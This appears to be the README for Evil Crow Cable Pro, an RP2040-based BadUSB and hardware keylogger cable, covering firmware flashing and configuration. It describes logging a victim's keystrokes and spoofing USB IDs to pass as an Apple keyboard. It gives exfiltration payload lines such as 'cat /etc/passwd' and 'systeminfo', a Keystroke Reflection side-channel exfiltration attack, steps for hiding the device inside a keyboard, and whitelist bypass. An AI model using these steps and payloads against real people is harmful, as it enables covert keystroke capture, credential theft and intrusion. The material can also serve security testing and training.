BadUSB and Hardware Keylogger cable based on RP2040 microcontroller.
Idea, development and implementation: Joel Serna (@JoelSernaMoreno).
PCB design: Ignacio Díaz Álvarez (@Nacon_96) and Forensic Security (@ForensicSec).
Manufacturer and distributor: AprilBrother (@aprbrother).
The developers and collaborators of this project do not earn money with this. You can invite me for a coffee to further develop Low-Cost hacking devices. If you don't invite me for a coffee, nothing happens, I will continue developing devices.
Available with April Brother (shipping from China):
Available with SAPSAN Cybersec & Military (shipping from EU, Poland):
Available with KSEC Worldwide (shipping from United Kingdom):
- Disclaimer
- Introduction
- Installation
- Basic requirements
- Layouts
- Payloads
- Firmware
- Configuration
- Change USB configuration
- Keylogger viewlog
- Keylogger deletelog
- Data exfiltration
- Data exfiltration viewlog
- Data exfiltration deletelog
- Keystroke Reflection
- Keystroke Reflection viewlog
- Keystroke Reflection deletelog
- USB Host Mouse
- Format FS
- Keylogger
- With adapter
- Weaponize a keyboard
- Demo
- Install and Use
- Bypass interface whitelist
Evil Crow Cable Pro is a basic device for professionals and cybersecurity enthusiasts.
We are not responsible for the incorrect use of Evil Crow Cable Pro.
We recommend using this device for testing, learning and fun :D
Evil Crow Cable Pro is a BadUSB and Hardware Keylogger device based on RP2040 microcontroller.
- All devices have been flashed with basic firmware Evil Crow Cable Pro before shipping (Keylogger firmware).
- Please do not ask me to implement new functions in this code. You can develop code for Evil Crow Cable Pro and send PR with your new code.
Download and Install Arduino IDE 1.8.19 (Legacy IDE 1.8.X):
Download Evil Crow Cable Pro repository: git clone
Open Arduino IDE.
Go to File - Preferences. Locate the field "Additional Board Manager URLs:" Add "" without quotes. Click "Ok".
Select Tools - Board - Boards Manager. Search for "rp2040". Install "Raspberry Pi Pico/RP2040 version 3.3.0 by Earle F. Philhower". Click "Close".
Go to EvilCrowCable-Pro/libraries directory and unzip all libraries in Arduino libraries directory.
Open firmware.ino in Arduino IDE.
Select Tools:
- Board - "Raspberry Pi Pico".
- Flash Size - "2MB (Sketch: 1MB, FS: 1MB)".
- CPU Speed - "120 MHz".
- USB Stack - "Adafruit TinyUSB".
- All other options: Default
Flash firmware.
Evil Crow Cable Pro is configured with English layout (EN_US), but is compatible with other keyboard layouts:
Available layouts:
Edit USBCrowKeyboard.cpp in your Arduino library directory (USBCrowKeyboard/USBCrowKeyboard.cpp). Modify #define US_KEYBOARD to new layout (example: #define ES_KEYBOARD). Flash firmware again.
NOTE: Not all layouts tested. If you find any wrong key you can change it and send PR to Evil Crow Cable Pro repository.
In firmware.ino you can find a file to include the payload (payload.h). Modify this with your new payload.
NOTE: Check EvilCrowCable-Pro/payloads for some examples :)
This firmware allows a combination of Hardware Keylogger and BadUSB.
NOTE: The flash memory is very small. Do not store very large logs or you will brick Evil Crow Cable Pro.
You can configure the Keylogger and BadUSB from the config.h file:
- #define CHANGE_USB_CONFIG (true or false): Set CHANGE_USB_CONFIG true to change Vendor ID, Product ID, Manufacturer and Product.
- #define PAYLOAD_RUN (true or false): Set PAYLOAD_RUN true to execute the payload included in payload.h. Set PAYLOAD_RUN false to not execute the payload.
- #define KEYLOGGER (true or false): Set KEYLOGGER true to enable Evil Crow Cable Pro as a Hardware Keylogger. Set KEYLOGGER false to disable Hardware Keylogger.
- #define EXFIL (true or false): Set EXFIL true to enable Evil Crow Cable Pro to exfiltrate data. Set EXFIL false to disable data exfiltration.
- #define EXFIL_VIEWLOG (true or false): Set EXFIL_VIEWLOG true to view the data exfiltration log (serial monitor).
- #define EXFIL_DELETELOG (true or false): Set EXFIL_DELETELOG true to delete log.
- #define KEYLOGGER_VIEWLOG (true or false): Set KEYLOGGER_VIEWLOG true to view the keylogger log (serial monitor).
- #define KEYLOGGER_DELETELOG (true or false): Set KEYLOGGER_DELETELOG true to delete log.
- #define KEYSTROKE_REFLECTION (true or false): Set KEYSTROKE_REFLECTION true to Keystroke Reflection attack.
- #define REFLECTION_VIEWLOG (true or false): Set REFLECTION_VIEWLOG true to view the data exfil log (serial monitor).
- #define REFLECTION_DELETELOG (true or false): Set REFLECTION_DELETELOG true to delete log.
- #define USBHOST_MOUSE (true or false): Set USBHOST_MOUSE true to enable USB Host Mouse.
- #define FORMATFS (true or false): Set FORMATFS true to format FS.
Evil Crow Cable Pro is configured with a default VID/PID/Manufacturer/Product. You can change the USB configuration. Set CHANGE_USB_CONFIG true to change Vendor ID, Product ID, Manufacturer and Product. (example: Apple keyboard):
If you enable CHANGE_USB_CONFIG to true, Evil Crow Cable Pro turns into an Apple keyboard.
Configure #define KEYLOGGER_VIEWLOG true in config.h. Flash the firmware in Evil Crow Cable Pro, open serial monitor and wait 10 seconds.
Configure #define KEYLOGGER_DELETELOG true in config.h. Flash the firmware in Evil Crow Cable Pro, open serial monitor and wait 5 seconds.
Set #define EXFIL true in config.h to enable data exfiltration. Use exfilWin(command), exfilNix(command) or exfiMac(command) in payload.h. For example:
- exfilWin("systeminfo");
- exfilNix("cat /etc/passwd");
- exfilMac("whoami");
Configure #define EXFIL_VIEWLOG true in config.h. Flash the firmware in Evil Crow Cable Pro, open serial monitor and wait 10 seconds.
delay(2000); exfilNix("whoami"); delay(3000); exfilNix("cat /etc/passwd");
Configure #define EXFIL_DELETELOG true in config.h. Flash the firmware in Evil Crow Cable Pro, open serial monitor and wait 5 seconds.
Keystroke Reflection is a new side-channel exfiltration technique developed by Hak5.
Evil Crow Cable Pro features a USB HID OUT endpoint which may accept control codes for the purposes of toggling the lock key LED indicators.
By taking advantage of this architecture, the Evil Crow Cable Pro may glean sensitive data by means of Keystroke Reflection, using the lock keys as an exfiltration pathway.
The Keystroke Reflection attack consists of two phases. In the first phase the data of interest, or "loot", is gathered from the target and encoded as lock keystrokes for reflection.
In the second phase, the Evil Crow Cable Pro enters Exfil Mode where it will act as a control code listener on the HID OUT endpoint. Then, the target reflects the encoded lock keystrokes.
Configure Keystroke Reflection in Evil Crow Cable Pro:
- Edit firmware.ino and uncomment the following line:
- Edit firmware.ino and uncomment the following lines:
- Edit config.h and set KEYSTROKE_REFLECTION to true:
- Edit payload.h and use Reflection:
- Flash the firmware and connect the Evil Crow Cable Pro to a Windows target
Configure #define REFLECTION_VIEWLOG true in config.h. Flash the firmware in Evil Crow Cable Pro, open serial monitor and wait 10 seconds.
Configure #define REFLECTION_DELETELOG true in config.h. Flash the firmware in Evil Crow Cable Pro, open serial monitor and wait 5 seconds.
Evil Crow Cable Pro can function as a USB Host Mouse.
- Edit the USBCrowKeyboard.cpp file of the USBCrowKeyboard library and uncomment the following line:
- Configure #define USBHOST_MOUSE true in config.h. NOTE: Configure #define KEYLOGGER false. Flash the firmware in Evil Crow Cable Pro
- Additionally, you can use a mouse click to execute the payload:
- Configure PAYLOAD_RUN_CLICK = "NONE"; to not execute the payload
- Configure PAYLOAD_RUN_CLICK = "MOUSE_BUTTON_LEFT"; to execute the payload with the left mouse click
- Configure PAYLOAD_RUN_CLICK = "MOUSE_BUTTON_RIGHT"; to execute the payload with the right mouse click
- Configure PAYLOAD_RUN_CLICK = "MOUSE_BUTTON_MIDDLE"; to execute the payload with the middle mouse click
- Open firmware.ino and set #define FORMATFS true. Flash the firmware and wait 10 seconds.
- Set #define FORMATFS false in config.h and configure config.h with your new configuration. Flash the firmware.
Format FS OK:
You can use an adapter:
- Open a keyboard:
- Cut the keyboard cable
- Solder Evil Crow Cable Pro
- Close the keyboard
Evil Crow Cable Pro - Install and Use:
Here the Video: Demo Video
Evil Crow Cable Pro - Bypass interface whitelist:
Here the Video: Demo Video 2